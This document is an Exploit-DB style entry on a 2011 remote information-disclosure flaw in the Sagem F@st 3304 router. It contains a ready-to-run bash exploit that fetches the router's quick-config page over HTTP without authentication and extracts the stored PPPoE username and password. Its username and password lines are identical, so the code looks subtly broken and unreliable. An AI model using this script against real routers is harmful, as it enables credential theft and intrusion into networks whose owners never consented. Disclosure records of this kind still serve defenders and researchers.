Sagem F@st 3304 Router Remote Information Disclosure Vulnerability

vendor:

F@st 3304 Router

by:

securititracker@gmail.com

N/A

CVSS

N/A

Remote Information Disclosure

Unknown

CWE

Product Name: F@st 3304 Router

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE: Unknown

Metasploit:

Other Scripts:

Platforms Tested:

2011

Sagem F@st 3304 Router Remote Information Disclosure Vulnerability

The Sagem F@st 3304 router is prone to a remote information-disclosure vulnerability because it fails to restrict access to sensitive information. A remote attacker can exploit this issue to obtain sensitive information, possibly aiding in further attacks.

Mitigation:

Unknown

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/48908/info

Sagem F@st 3304 router is prone to a remote information-disclosure vulnerability because it fails to restrict access to sensitive information.

A remote attacker exploit this issue to obtain sensitive information, possibly aiding in further attacks. 

#!/bin/bash
#########################################
# Exploit Title: Sagem 3304 Routers Get PPPOE Password
# Date 27/07/2011
# Author: securititracker@gmail.com
# Software Link: null
# Version: Sagem Routers F@st 3304
# Tested on: Sagem F@ST 3304
#
#########################################


Usage()
{
        echo "Usage : $0 IP_ADDRESS"
}
if [ "$1" != "" ]
then
        IP_ADDRESS="$1"
else
        Usage
        exit 1
fi

USER_NAME=`wget http://$IP_ADDRESS/quickconfname_ADSL.html  -t 1 -q -O -  | grep "msg051" | tr " " "\n"  | grep value | tr -d \\ |tr -d "\"" | awk -F= '{print($2)}' `

USER_PASSWORD=`wget http://$IP_ADDRESS/quickconfname_ADSL.html  -t 1 -q -O -  | grep "msg051" | tr " " "\n"  | grep value | tr -d \\ |tr -d "\"" | awk -F= '{print($2)}' `

echo "Username = $USER_NAME  ; Passsword = $USER_PASSWORD"